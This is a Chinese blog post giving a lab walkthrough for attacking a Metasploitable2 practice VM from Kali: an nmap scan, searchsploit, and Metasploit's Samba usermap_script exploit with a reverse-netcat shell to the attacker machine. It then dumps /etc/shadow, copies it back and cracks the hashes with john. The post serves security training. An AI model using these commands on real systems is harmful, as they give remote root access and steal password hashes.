【材料】

kali系统(攻击机),metasploitable(靶机,下载地址https://sourceforge.net/projects/metasploitable/files/Metasploitable2/)

【靶机】

登录,用户名:msfadmin,密码msfadmin

并查看靶机IP

ifconfig

获取靶机IP地址(例如,192.168.1.100),并保持靶机开机运行

 

【攻击机】

1. 扫描靶机当前开启服务

nmap -T4 -F 192.168.1.100

得到结果如下,展示了已开启服务,其中重点关注samba(445/TCP),FTP:

 2. 针对samba服务,使用searchsploit在漏洞数据库中查找是否有相关漏洞可利用

searchsploit samba 3.x

搜索结果如下,exploit列为符合搜索要求的项目,title为此项目存在什么漏洞,path为该漏洞的攻击载荷:

 3. 进入操作台执行攻击

msfconsole

进入成功则光标显示为msf6>

4. 加载攻击模块

use exploit/multi/samba/usermap_script

设定攻击对象(192.168.1.100),监听对象(192.168.1.101),载荷

set RHOSTS 192.168.1.100
set LHOST 192.168.1.101
set PAYLOAD cmd/unix/reverse_netcat

启动攻击

exploit

显示结果如下则表示攻击成功,已获取靶机root权限:

 5. 测试靶机

whoami
ifconfig
cat /etc/shadow

得到靶机内所有用户及密码

 

6. 保存密码到文件hash.txt,并传递给kali攻击机

cat /etc/shadow > hash.txt
download /hash.txt /home/(你的kali用户名)/hash.txt

【注意】

一定要在kali的对应位置提前准备好文档hash.txt

结果如下则表示传递成功:

 

7. 返回kali查看文件,利用john解密用户密码并保存到新文件uncode.txt

john --format=md5crypt hash.txt --pot=uncode.txt

同样也需要提前在相同文件夹下生成一个uncode.txt文件

 【注意】

如果连续使用john指令,要确保上一个john命令已经终止运行,需要删除john.rec文件

rm /home/xxxx你的用户名/.john/john.rec

 

破解结束后就可以查看啦,结束!

 

posted on 2025-06-28 22:24  swannie  阅读(92)  评论(0)    收藏  举报